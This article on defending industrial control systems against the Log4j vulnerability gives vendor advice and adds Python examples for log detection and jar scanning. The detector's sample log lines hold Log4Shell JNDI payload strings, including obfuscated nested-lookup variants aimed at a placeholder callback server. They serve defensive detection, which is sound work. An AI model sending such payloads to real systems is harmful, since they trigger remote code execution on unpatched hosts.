Protect Your Control System from Log4j Breaches

Though no information about industrial control system breaches via log4j has been made public, these systems are vulnerable. ABS Group's Dennis Hackney offers tips on how users can protect themselves.


The log4j vulnerability is a cybersecurity loophole in a small, nearly ubiquitous piece of software called log4j, a Java library used for recording the activities of various computer programs. This logging of events, errors, and routine system operations is performed so that diagnostic messages can be communicated to system administrators and users. However, vulnerable versions of log4j also evaluate special lookup expressions embedded in the text being logged, and one of those lookups (JNDI) fetches and runs code from a third-party server named in the expression. In the hands of a hacker who can get such an expression into a log message, for example by placing it in a web request field that the application logs, this could be used to perform malicious actions on a targeted system, such as stealing sensitive information, taking control of a system, or passing malicious content onto other users communicating with the affected server.
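As an added example (not part of the original article), the following Python script shows what the malicious input described above looks like in practice and how a defender can spot it in logs. Attackers rarely send the plain `${jndi:ldap://...}` form; they wrap it in nested lookups such as `${lower:j}` or `${::-j}` that log4j resolves before the JNDI lookup fires. The script models that resolution (only the `lower`, `upper` and default-value rules are implemented; other lookup types are replaced by their default value or left alone) to normalize each line, then flags JNDI references and extracts the server they point at. The access-log lines are constructed for the example and the addresses in them are documentation ranges, not real hosts.

```python
import re
from typing import Dict, List, Optional

# Innermost ${...} expression: a body with no nested "${" and no braces.
INNERMOST = re.compile(r"\$\{((?:[^${}]|\$(?!\{))*)\}")
# Markers that freeze an expression we deliberately do not expand, so the loop terminates.
KEEP_OPEN, KEEP_CLOSE = "\x01", "\x02"
# After normalization: ${jndi:<scheme>://<host>[:<port>]...}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//\s*([^/:}\s]+)(?::(\d+))?", re.IGNORECASE)

# Constructed sample lines in a web-server access-log format (not real traffic).
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /hmi/login HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:14:03:52 +0000] "GET /hmi/login HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:05:01 +0000] "GET /api/tags?name=${${lower:j}${upper:n}di:${lower:l}dap://198.51.100.23:1389/x} HTTP/1.1" 400 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:14:05:09 +0000] "GET /api/tags HTTP/1.1" 200 "-" "${${env:NOPE:-j}ndi:${env:NOPE:-r}mi://198.51.100.23:1099/Exploit}"',
    '10.0.0.4 - - [10/Dec/2021:14:06:30 +0000] "GET /trend?tag=${date:yyyy} HTTP/1.1" 200 "-" "Mozilla/5.0"',
]


def _resolve(match: "re.Match[str]") -> str:
    """Resolve one innermost lookup roughly as log4j's Interpolator would, as far as is possible offline."""
    body = match.group(1)
    prefix, _, rest = body.partition(":")
    default: Optional[str] = None
    if ":-" in rest:                      # ${prefix:key:-default}
        rest, default = rest.split(":-", 1)
    prefix = prefix.strip().lower()       # log4j lower-cases the lookup prefix before matching it
    if prefix == "jndi":
        return KEEP_OPEN + body + KEEP_CLOSE   # the dangerous one: keep it, frozen, for the detector
    if prefix == "lower":
        return rest.lower()
    if prefix == "upper":
        return rest.upper()
    # env:, sys:, date:, ... depend on the victim host. The attacker relies on the default branch,
    # so take the default when there is one and otherwise leave the expression untouched.
    return default if default is not None else KEEP_OPEN + body + KEEP_CLOSE


def normalize_lookups(text: str, max_rounds: int = 64) -> str:
    """Expand nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        expanded = INNERMOST.sub(_resolve, text)
        if expanded == text:
            break
        text = expanded
    return text.replace(KEEP_OPEN, "${").replace(KEEP_CLOSE, "}")


def find_log4shell(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per JNDI lookup found: line number, scheme, and the server it would contact."""
    hits: List[Dict[str, object]] = []
    for number, line in enumerate(lines, 1):
        normalized = normalize_lookups(line)
        for m in JNDI.finditer(normalized):
            hits.append({
                "line": number,
                "scheme": m.group(1).lower(),
                "host": m.group(2),
                "port": m.group(3) or "",
                "lookup": m.group(0),
            })
    return hits


if __name__ == "__main__":
    for hit in find_log4shell(SAMPLE_LINES):
        print(hit)
```

The host and port the detector extracts are the attacker's callback server; on an ICS network that address should also show up as an attempted outbound LDAP or RMI connection in firewall logs, which is the second place to look.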

Currently, no information has been made available about log4j compromises of any industrial control systems (ICS). Still, because the code is so commonly used, such a compromise remains entirely possible. To learn more about how industrial operators can protect their systems, Automation World spoke with Dennis Hackney, head of industrial cybersecurity services development at ABS Group, an operational risk management company and provider of cybersecurity consulting services.

How the log4j Vulnerability Can Affect an ICS

If a log4j attack occurs, malicious code could be executed on an ICS, granting a threat actor the ability to take control of applications used to view and control physical processes, Hackney says. If an ICS safety system is in place, this loss of control may only result in a temporary system shutdown, from which the ICS can be restored to an earlier state. However, if no safety system is in place and the software controlling the ICS is compromised, a hacker could gain control. This can occur even if the software on the breached ICS is not controlling a process directly. In a worst-case scenario, where an application controls physical processes involving large machinery such as pumps, valves, or tanks that contain hazardous materials or sit in close proximity to employees, catastrophic and severe safety risks could result.

According to Hackney, a log4j breach could lead to several hypothetical scenarios:

  • If a historian server is compromised, historical process data such as process trends or control system performance records could be stolen.
  • If a SCADA (supervisory control and data acquisition) server is compromised, threat actors could view or control processes by interpreting the data, making control changes, or modifying sensor readings in a way that goes unnoticed by operators. This could lead to equipment damage, environmental accidents, or even injuries to employees.
  • If ransomware were to be installed on an ICS, the entire system could be shut down, forcing operators to either pay a ransom fee or engage in a complete rebuild of their ICS servers and workstations.

How Can Industrial Operations Be Protected Against Log4j Attacks?

Hackney also offers several recommendations for control system end users who want to be more proactive in preventing potential log4j attacks:

  • Identify and isolate any critical ICS from the internet and business networks.
  • Develop isolation and manual control workarounds that limit the operational impact if a vulnerability like log4j is discovered.
  • Monitor necessary outgoing connections for cyber threats. Many ICS produce outgoing communications pertaining to maintenance, metering, diagnostics, and more. This matters for Log4Shell in particular: the exploit only completes if the logging host can open an outbound connection (typically LDAP or RMI) to the attacker's server, so an unexpected outbound connection from an ICS host is itself a strong indicator, and an egress allowlist blocks the code-fetch stage of the attack even on an unpatched system.
  • Ensure frequent backups are made, and that rigid backup procedures exist. If operators have a stable, tested backup of their ICS, they can be confident that, should an incident occur, they can bring their systems back online as quickly as possible.
  • Update the version of log4j used in your systems. The National Institute of Standards and Technology's National Vulnerability Database reports that Log4Shell (the name for the log4j vulnerability, CVE-2021-44228) was disabled by default in log4j 2.15.0 and that the lookup feature behind it was removed entirely in version 2.16.0. The 2.15.0 fix later proved incomplete, and further follow-on issues were fixed in 2.17.0 and 2.17.1, so target the latest 2.x release available for your Java version rather than the minimum fixed version. Where a vendor application cannot be patched yet, removing the JndiLookup class from the log4j-core jar is the mitigation Apache recommends for older releases.
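To make the "update log4j" item actionable on an ICS host, here is an added Python example (not from the article or ABS Group) that inventories log4j-core inside jar files, including jars nested inside vendor application archives, which is where ICS software usually carries it. It reads the version from the Maven pom.properties that log4j-core ships, checks whether the JndiLookup class is still present, and classifies the result against the fixed releases Apache published (2.17.1 for Java 8 and later, 2.12.4 for Java 7, 2.3.2 for Java 6, with 2.15.0, 2.12.2 and 2.3.1 as the first releases on each line that closed Log4Shell itself). The sample jars are constructed in memory so the script runs offline; point `scan_tree` at a real directory to scan a host.

```python
import io
import re
import zipfile
from pathlib import Path
from typing import Dict, List, Optional, Tuple

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
CORE_PREFIX = "org/apache/logging/log4j/core/"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def parse_version(version: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); qualifiers such as '2.0-beta9' are truncated to (2, 0, 0)."""
    parts = [int(p) for p in version.split("-")[0].split(".") if p.isdigit()]
    return tuple((parts + [0, 0, 0])[:3])


def assess(version: str, jndi_lookup_present: bool) -> str:
    """Classify a log4j-core version against the fixed releases published by Apache."""
    v = parse_version(version)
    if v[0] != 2:
        return "not-log4j2"              # 1.x has no message-lookup code path (but is end-of-life)
    if v[:2] == (2, 3):                  # Java 6 line
        first_fix, latest = (2, 3, 1), (2, 3, 2)
    elif v[:2] == (2, 12):               # Java 7 line
        first_fix, latest = (2, 12, 2), (2, 12, 4)
    else:                                # Java 8 and later
        first_fix, latest = (2, 15, 0), (2, 17, 1)
    if v < first_fix:
        # Log4Shell itself applies; removing JndiLookup.class is Apache's mitigation for these releases
        return "vulnerable" if jndi_lookup_present else "mitigated-jndilookup-removed"
    return "fixed" if v >= latest else "partially-fixed"


def _core_version(zf: zipfile.ZipFile, names: set) -> Optional[str]:
    if POM_PROPS in names:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip()
    if "META-INF/MANIFEST.MF" in names:   # fallback for repackaged jars that dropped pom.properties
        text = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        if re.search(r"^Implementation-Title:.*log4j", text, re.M | re.I):
            m = re.search(r"^Implementation-Version:\s*(\S+)", text, re.M)
            if m:
                return m.group(1)
    return None


def scan_archive(data: bytes, label: str, depth: int = 0, max_depth: int = 3) -> List[Dict[str, object]]:
    """Report every log4j-core found in an archive, descending into nested jars/wars (fat jars)."""
    findings: List[Dict[str, object]] = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names or any(n.startswith(CORE_PREFIX) for n in names):
            version = _core_version(zf, names)
            present = JNDI_LOOKUP in names
            findings.append({
                "archive": label,
                "version": version or "unknown",
                "jndi_lookup_present": present,
                "status": assess(version, present) if version else "unknown-version",
            })
        if depth < max_depth:
            for n in sorted(names):
                if n.lower().endswith(ARCHIVE_EXT):
                    findings.extend(scan_archive(zf.read(n), f"{label}!{n}", depth + 1, max_depth))
    return findings


def scan_tree(root: Path) -> List[Dict[str, object]]:
    """Walk a directory (e.g. a vendor's install tree) and scan every archive in it."""
    findings: List[Dict[str, object]] = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVE_EXT:
            findings.extend(scan_archive(path.read_bytes(), str(path)))
    return findings


# --- constructed sample input: stand-ins for log4j-core jars, not real Apache artifacts ---
def build_core_jar(version: str, with_jndi_lookup: bool) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        zf.writestr(CORE_PREFIX + "Logger.class", b"\xca\xfe\xba\xbe")   # placeholder class bytes
        if with_jndi_lookup:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def build_app_jar(core_jar: bytes) -> bytes:
    """A hypothetical vendor 'fat jar' that carries log4j-core under lib/, as ICS applications often do."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("com/example/hmi/Main.class", b"\xca\xfe\xba\xbe")
        zf.writestr("lib/log4j-core-2.14.1.jar", core_jar)
    return buf.getvalue()


if __name__ == "__main__":
    samples = {
        "log4j-core-2.14.1.jar": build_core_jar("2.14.1", True),
        "log4j-core-2.14.1-stripped.jar": build_core_jar("2.14.1", False),
        "hmi-server.jar": build_app_jar(build_core_jar("2.14.1", True)),
        "log4j-core-2.17.1.jar": build_core_jar("2.17.1", True),
    }
    for label, data in samples.items():
        for finding in scan_archive(data, label):
            print(finding)
```

A "mitigated-jndilookup-removed" result means someone has already applied the class-removal workaround; it is still worth recording, because the next vendor update may reinstall the original jar and silently undo it.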

In addition, there are steps ICS vendors and original equipment manufacturers (OEMs) can take, Hackney says. For one, they should announce any log4j vulnerabilities that exist in their products, since end users might not even be aware of them. From there, they should release remediations, mitigations, and patches to help prevent a log4j breach. OEMs can also assist their clients in the discovery of log4j vulnerabilities through the development of specialized support services. Not only would this help end users protect themselves more easily, but it could also benefit the OEMs by giving their customers access to a premium service that competitors may not be providing. According to Hackney, this service could be provided via a cyber response hotline that customers could call to receive guidance on how best to discover and address vulnerabilities in their ICS. Finally, Hackney recommends that all ICS vendors and OEMs update their design, engineering, and acceptance testing processes to include cybersecurity practices and vulnerability management.
